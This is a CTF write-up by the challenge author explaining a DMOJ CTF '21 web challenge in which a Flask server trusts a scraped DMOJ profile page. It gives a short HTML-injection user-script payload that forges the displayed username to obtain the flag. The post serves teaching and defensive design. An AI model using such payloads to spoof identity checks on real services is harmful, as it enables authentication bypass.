Don't Trust User Input!

DMOJ CTF ‘21 was a CTF that I created for fun on the DMOJ programming platform. It consisted of 22 challenges that ranged from beginner to intermediate difficulty. I want to highlight one of the problems that I developed, which teaches a lesson about proper authentication mechanisms.

The Challenge

This was the third challenge in the “web” category of the contest, titled “whoami”.

The challenge is a web server written in Python using the Flask framework. The main endpoint it exposes is:

@app.route('/whoami', methods=['POST'])
def whoami():
	token = request.form.get('token')
	# Reject missing tokens and tokens outside the accepted length range.
	if token is None or not 1 < len(token) < 60:
		return 'invalid token'

	# Load the DMOJ profile page as whoever owns this token.
	res = requests.get('https://dmoj.ca/user', headers={
		'Authorization': 'Bearer ' + token
	})

	if not res.ok:
		return 'invalid token'

	dom = BeautifulSoup(res.text, features='html.parser')
	user = dom.select_one('#user-links b')

	if user is None:
		return 'invalid token'

	if user.text == 'flag': # https://dmoj.ca/user/flag
		return flag

	return user.text

The Authentication Mechanism

The authentication mechanism here relies on API tokens. DMOJ introduced API tokens in 2020 so that you can authenticate as a certain user with a token instead of using cookies. This lets scripts and programs access DMOJ as authenticated users, which opened up a host of opportunities for developing external tools for the website.

The challenge uses the submitted API token to decide whether you have access to a certain account. It does this by requesting the /user page on the site with that token and reading the username displayed at the top of the page.

More specifically, it queries for the element with id user-links and finds the content of the first <b> tag inside.

At first glance, this seems like a perfectly secure mechanism. After all, the only thing it’s doing is setting the Authorization header in an HTTP request. The version of requests used here already has CR-LF injection attacks fixed, so in theory there are only two possibilities: the user enters a valid API token and the server finds the username that the token belongs to, or the user enters an invalid token and the server doesn’t find any username.
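To make the CR-LF point concrete, here is a minimal sketch of what such an injection attempt looks like and how a patched HTTP client refuses it. It uses Python’s standard-library http.client as a stand-in rather than requests itself, and the host example.invalid, the helper header_is_accepted, and the sample tokens are all made up for illustration. Nothing is sent over the network.

```python
import http.client


def header_is_accepted(token):
    """Return True if the client agrees to queue an Authorization header for this token."""
    # Hypothetical host; the connection is never opened, headers are only buffered.
    conn = http.client.HTTPConnection("example.invalid")
    conn.putrequest("GET", "/user")
    try:
        # A CR-LF inside the value would start a new, attacker-chosen header line.
        conn.putheader("Authorization", "Bearer " + token)
    except ValueError:
        # http.client rejects header values that contain a bare line break.
        return False
    finally:
        conn.close()
    return True


print(header_is_accepted("abc123"))
print(header_is_accepted("abc123\r\nX-Injected: 1"))
```

The first token is accepted and the second is rejected, which is why the token itself is a dead end for the attacker in this challenge.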

There’s More User Input!

It turns out, however, that there’s more user input here than just what the user sends to the server. DMOJ has a feature that lets users enter custom “user scripts”, which run arbitrary JS on every page of the website while they’re logged in. Since users are entering their own scripts, this isn’t a security vulnerability on its own: at worst it would be a “self-XSS” attack.

At a glance, this shouldn’t be an issue, since BeautifulSoup isn’t a headless browser and will not execute JS. However, if you look at the source code of a page with a user script, you’ll notice that the user script is injected verbatim into the HTML of the page:

<script type="text/javascript"><!-- User Script Here --></script>

Since there’s no way for DMOJ to escape HTML out of JS (which would break a lot of scripts), you can enter </script> to close the script element early and inject arbitrary HTML.
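To see why blanket escaping would break scripts, here is a small sketch that uses Python’s html.escape as a stand-in for whatever HTML escaping a site might apply. This is not DMOJ’s code, and the sample user script is made up.

```python
import html

# Hypothetical user script: ordinary JS that happens to use < and &.
user_script = "if (a < b && c) { run(); }"

# HTML-escaping rewrites the operators, so the result is no longer valid JS.
escaped = html.escape(user_script)
print(escaped)  # if (a &lt; b &amp;&amp; c) { run(); }
```

Any script that uses comparison or logical operators would stop working after this kind of escaping.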

The Exploit

The exploit, then, is to create a DMOJ account and set its user script to:

</script><div id="user-links"><b>flag</b></div> <!--

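This closes the script element, injects a fake user-links element whose <b> tag contains flag, and opens an HTML comment that comments out the rest of the page, preventing BeautifulSoup from parsing any of it. Submitting that account’s API token to /whoami then makes the server read the username as flag and return the flag.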
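The effect on the parser can be sketched without touching DMOJ at all. The snippet below is a rough illustration under several assumptions: render_page is a hypothetical, heavily simplified page template (the real DMOJ markup differs), attacker is a made-up username, and Python’s standard-library HTMLParser stands in for BeautifulSoup, whose html.parser backend is built on top of it.

```python
from html.parser import HTMLParser

USER_SCRIPT = '</script><div id="user-links"><b>flag</b></div> <!--'


class FirstUserLinkFinder(HTMLParser):
    """Record the text of the first <b> that follows an element with id="user-links"."""

    def __init__(self):
        super().__init__()
        self.in_user_links = False
        self.in_bold = False
        self.username = None

    def handle_starttag(self, tag, attrs):
        if dict(attrs).get("id") == "user-links":
            # Simplification: never reset, since only the first match matters here.
            self.in_user_links = True
        elif tag == "b" and self.in_user_links and self.username is None:
            self.in_bold = True

    def handle_endtag(self, tag):
        if tag == "b":
            self.in_bold = False

    def handle_data(self, data):
        if self.in_bold and self.username is None:
            self.username = data


def render_page(real_username, user_script):
    # Hypothetical template: the user script is pasted verbatim into a script element.
    return (
        "<html><head>"
        '<script type="text/javascript">' + user_script + "</script>"
        "</head><body>"
        '<span id="user-links"><b>' + real_username + "</b></span>"
        "</body></html>"
    )


def find_username(page):
    finder = FirstUserLinkFinder()
    finder.feed(page)
    finder.close()
    return finder.username


print(find_username(render_page("attacker", 'console.log("hi")')))
print(find_username(render_page("attacker", USER_SCRIPT)))
```

With a harmless script the parser reports the real username, while with the exploit script the first user-links element it encounters is the injected one.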

Lessons Learned

When designing a system that relies on another service, you have to consider all the user input that is possible, not just the input that you’re taking directly. Realistically, you should always use a system like OAuth2 or similar to perform cross-platform authentication. When that is not possible, you need to be very careful about all of the user input that can reach your system, whether directly or indirectly.